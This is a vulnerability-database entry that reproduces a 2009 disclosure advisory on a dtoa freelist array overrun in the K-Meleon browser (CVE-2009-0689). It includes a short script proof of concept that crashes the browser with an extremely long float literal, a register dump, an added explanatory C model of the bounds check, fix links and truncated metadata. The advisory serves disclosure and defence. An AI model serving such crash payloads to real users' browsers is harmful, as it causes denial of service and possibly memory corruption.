ID SSV:67076 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 20.11.2009
CVE: CVE-2009-0689
Risk: High
Remote: Yes
Affected Software:
- - K-Meleon 1.5.3
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/72
- --- 0.Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also used
by Firefox. K-Meleon is free, open source software released under the
GNU General Public License and is designed specifically for Microsoft
Windows (Win32) operating systems.
- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. K-Meleon uses the same
dtoa as KDE, Opera and all BSD systems. This issue has been fixed in
Firefox 3.5.4; the original report and fix are at
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good.
More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create a float literal of any length, which will overwrite memory.
Kmax is defined as 15 in dtoa. The functions in dtoa do not check the Kmax
limit, so it is possible to reach elements 16 and above of the freelist array.
- --- 2. Proof of Concept (PoC) ---
- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------
K-Meleon will crash with
Unhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access
violation reading location 0x0bc576ec.
01800754 mov eax,dword ptr [ecx]
EAX 00000002
ECX 0BC576EC
EDI 028FEB51
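Why the PoC above lands on freelist index 16, and the bounds check the fixed gdtoa applies, as an added C model that is not code from the advisory, K-Meleon or gdtoa: s2b() packs 9 decimal digits per word and Balloc() picks the smallest power-of-two bucket k, so 296450 digits give 32939 words and k = 16, one past the last of the Kmax+1 freelist slots. The digits-per-word packing and the bucket loop follow David Gay's dtoa.c; the Balloc_fixed/Bfree_fixed names and the simplified allocator are assumptions of this example.

```c
/* Added example (not code from the advisory, K-Meleon or gdtoa): a reduced
 * model of dtoa's Balloc()/Bfree() freelist showing why a ~296k-digit
 * literal needs bucket index 16 while freelist[] has only Kmax+1 = 16
 * entries (indices 0..15), plus the check that fixed gdtoa applies.
 * Bigint layout and the bucket computation follow David Gay's dtoa.c;
 * the rest is simplified (no private_mem arena, no locking). */
#include <stdio.h>
#include <stdlib.h>

#define Kmax 15                     /* value the advisory reports for the affected dtoa */

typedef unsigned int ULong;

typedef struct Bigint {
    struct Bigint *next;
    int k;                          /* bucket index: capacity is 1 << k words */
    int maxwds;
    int sign, wds;
    ULong x[1];                     /* word tail, as in dtoa.c */
} Bigint;

static Bigint *freelist[Kmax + 1];  /* the array the advisory says is overrun */

/* s2b() packs 9 decimal digits per 32-bit word when building a Bigint. */
int words_for_digits(int nd) { return (nd + 8) / 9; }

/* Bucket Balloc needs for x words: smallest k with (1 << k) >= x
 * (this is the loop s2b() runs before calling Balloc(k)). */
int bucket_for_words(int x) {
    int k, y;
    for (k = 0, y = 1; x > y; y <<= 1, k++)
        ;
    return k;
}

/* Digit count taken from the PoC above: 0.111...1 with 296450 ones. */
int bucket_for_poc_digits(void) { return bucket_for_words(words_for_digits(296450)); }

/* Unfixed dtoa indexes freelist[k] unconditionally; this predicate says
 * whether that index would fall outside the 16-entry array. */
int freelist_index_out_of_bounds(int k) { return k > Kmax; }

/* Hardened Balloc (assumed name): a bucket beyond Kmax never touches
 * freelist[] and is served by malloc() instead. */
Bigint *Balloc_fixed(int k) {
    Bigint *rv;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;     /* reuse a cached block of this size */
    } else {
        size_t x = (size_t)1 << k;
        rv = malloc(sizeof(Bigint) + (x - 1) * sizeof(ULong));
        if (rv == NULL)
            return NULL;
        rv->k = k;
        rv->maxwds = (int)x;
    }
    rv->sign = rv->wds = 0;
    return rv;
}

/* Hardened Bfree (assumed name): the matching check, so an oversized block
 * is released rather than threaded onto freelist[k] past the array end. */
void Bfree_fixed(Bigint *v) {
    if (v == NULL)
        return;
    if (v->k > Kmax) {
        free(v);
    } else {
        v->next = freelist[v->k];
        freelist[v->k] = v;
    }
}

/* Exercise both paths; returns 1 when a small block round-trips through
 * the freelist and the oversized PoC-sized block bypasses it. */
int freelist_selftest(void) {
    Bigint *small = Balloc_fixed(3);
    Bigint *big = Balloc_fixed(bucket_for_poc_digits());
    Bigint *again;
    int ok = small != NULL && big != NULL && big->maxwds == 65536;
    Bfree_fixed(small);
    ok = ok && freelist[3] == small;        /* cached for reuse */
    again = Balloc_fixed(3);
    ok = ok && again == small;              /* and handed back next time */
    Bfree_fixed(again);
    Bfree_fixed(big);                       /* goes to free(), not freelist[16] */
    return ok;
}

int main(void) {
    int k = bucket_for_poc_digits();
    printf("296450 digits -> %d words -> bucket k=%d (Kmax=%d): %s\n",
           words_for_digits(296450), k, Kmax,
           freelist_index_out_of_bounds(k) ? "out of bounds" : "in bounds");
    return freelist_selftest() ? 0 : 1;
}
```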
- --- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
This list is not yet closed. US-CERT declared that it would inform all
vendors about this issue; however, it did not do so. Even greater
confusion was caused by the new CVE number "CVE-2009-1563". Secunia stated
that this vulnerability was only detected in Mozilla Firefox, but nobody
was aware that the problem affects other products (KDE, Chrome)
and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation
Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be
essentially the same as that reported against the libc gdtoa routine by
Maksymilian Arciemowicz (CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the PoC in
JavaScript (from Secunia) forced us to officially notify all other
vendors. We publish all the individual advisories to formally show all
vulnerable software and to avoid wrong CVE numbers. We do not see any
other way to fix this issue in all products.
Please note:
The patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa
algorithm is not optimal and allows a remote Denial of Service in Firefox
3.5.5 when given a long float number.
- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c
- --- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.
- --- 6. Greets ---
Infospec p_e_a pi3
- --- 7. Contact ---
Email:
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg
http://securityreason.com/
http://securityreason.pl/
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o
l8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw
=Zqoe
-----END PGP SIGNATURE-----
{"enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-11-19T13:24:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1563", "CVE-2009-0689"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A769E84172D8627C1FB28EFC5E28E482", "EXPLOITPACK:BAEE9A0461F7CC4E4B3568E7D096BEFB", "EXPLOITPACK:32D2B684D6A2AB9F4EF85B2B51DAB5DC", "EXPLOITPACK:16C37B6C3C517D65315351878DA06F27"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22814", "SECURITYVULNS:DOC:22093", "SECURITYVULNS:DOC:22932", "SECURITYVULNS:DOC:22816", "SECURITYVULNS:VULN:10021", "SECURITYVULNS:DOC:23025", "SECURITYVULNS:DOC:22813", "SECURITYVULNS:DOC:22815", "SECURITYVULNS:DOC:22812", "SECURITYVULNS:DOC:22933"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82822", "PACKETSTORM:83740", "PACKETSTORM:84946", "PACKETSTORM:82824", "PACKETSTORM:89801", "PACKETSTORM:83739", "PACKETSTORM:83737", "PACKETSTORM:84952", "PACKETSTORM:82821", "PACKETSTORM:82823"]}, {"type": "seebug", "idList": ["SSV:67074", "SSV:18465", "SSV:67154", "SSV:18280", "SSV:67075", "SSV:14959", "SSV:18282", "SSV:18283", "SSV:18281", "SSV:11711"]}, {"type": "nessus", "idList": ["SUSE_MOZILLA-NSPR-6630.NASL", "FEDORA_2015-6DEC4E6D5F.NASL", "UBUNTU_USN-871-1.NASL", "SUSE_11_MOZILLA-NSPR-091103.NASL", "SUSE_11_1_MOZILLA-NSPR-091104.NASL", "DEBIAN_DLA-376.NASL", "SUSE_11_0_MOZILLA-NSPR-091104.NASL", "SL_20091027_SEAMONKEY_ON_SL3_X.NASL", "DEBIAN_DSA-1931.NASL", "SUSE_MOZILLA-NSPR-6631.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:66211", "OPENVAS:880851", "OPENVAS:880670", "OPENVAS:1361412562310131176", "OPENVAS:1361412562310122417", "OPENVAS:1361412562310880670", "OPENVAS:136141256231066121", "OPENVAS:1361412562310880851", "OPENVAS:66121", "OPENVAS:136141256231066211"]}, {"type": "ubuntu", "idList": ["USN-871-1"]}, {"type": "centos", "idList": ["CESA-2009:1601"]}, {"type": "threatpost", "idList": ["THREATPOST:DF62052EA2F1372006ACE34D8541F7DB"]}, {"type": "exploitdb", "idList": 
["EDB-ID:10185", "EDB-ID:33058", "EDB-ID:33480", "EDB-ID:33312", "EDB-ID:10380", "EDB-ID:33363", "EDB-ID:33479", "EDB-ID:10184", "EDB-ID:10187", "EDB-ID:10186"]}, {"type": "opera", "idList": ["OPERA:942"]}, {"type": "redhat", "idList": ["RHSA-2014:0312", "RHSA-2009:1601"]}, {"type": "freebsd", "idList": ["4B3A7E70-AFCE-11E5-B864-14DAE9D210B8"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1998-1:6C47A"]}, {"type": "fedora", "idList": ["FEDORA:98D276087D46"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1601"]}], "modified": "2017-11-19T13:24:36", "rev": 2}, "vulnersScore": 6.5}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-67076", "id": "SSV:67076", "sourceHref": "https://www.seebug.org/vuldb/ssvid-67076", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-11-19T13:24:36", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 8, "published": "2014-07-01T00:00:00", "cvelist": ["CVE-2009-0689", "CVE-2009-1563"], "title": "K-Meleon 1.5.3 - Remote Array Overrun", "sourceData": "\n From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser\r\nbased on the Gecko layout engine developed by Mozilla which is also used\r\nby Firefox. 
K-Meleon is free, open source software released under the\r\nGNU General Public License and is designed specifically for Microsoft\r\nWindows (Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. K-Meleon has the same\r\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\r\nFirefox 3.5.4 and fix\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\r\nis possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access\r\nviolation reading location 0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx]\r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number "CVE-2009-1563". 
Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on "CVE-2009-0689". After some time Mozilla Foundation\r\nSecurity Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\r\nalgorithm is not optimal and allows remote Denial of Service in Firefox\r\n3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. Contact ---\r\nEmail:\r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o\r\nl8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw\r\n=Zqoe\r\n-----END PGP SIGNATURE-----\r\n\n "}
{"cve": [{"lastseen": "2020-10-03T11:54:11", "description": "Array index error in the (1) dtoa implementation in dtoa.c (aka pdtoa.c) and the (2) gdtoa (aka new dtoa) implementation in gdtoa/misc.c in libc, as used in multiple operating systems and products including in FreeBSD 6.4 and 7.2, NetBSD 5.0, OpenBSD 4.5, Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4, K-Meleon 1.5.3, SeaMonkey 1.1.8, and other products, allows context-dependent attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a large precision value in the format argument to a printf function, which triggers incorrect memory allocation and a heap-based buffer overflow during conversion to a floating-point number.", "edition": 3, "cvss3": {}, "published": "2009-07-01T13:00:00", "title": "CVE-2009-0689", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0689"], "modified": "2018-11-02T10:29:00", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/o:freebsd:freebsd:6.4", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/o:netbsd:netbsd:5.0", "cpe:/o:freebsd:freebsd:7.2", "cpe:/a:mozilla:firefox:3.0.7", 
"cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/o:openbsd:openbsd:4.5", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:k-meleon_project:k-meleon:1.5.3", "cpe:/a:mozilla:seamonkey:1.1.8"], "id": "CVE-2009-0689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0689", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:stable:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p4:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:stable:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release_p2:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:4.5:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.2:pre-release:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:6.4:release:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:k-meleon_project:k-meleon:1.5.3:*:*:*:*:*:*:*", 
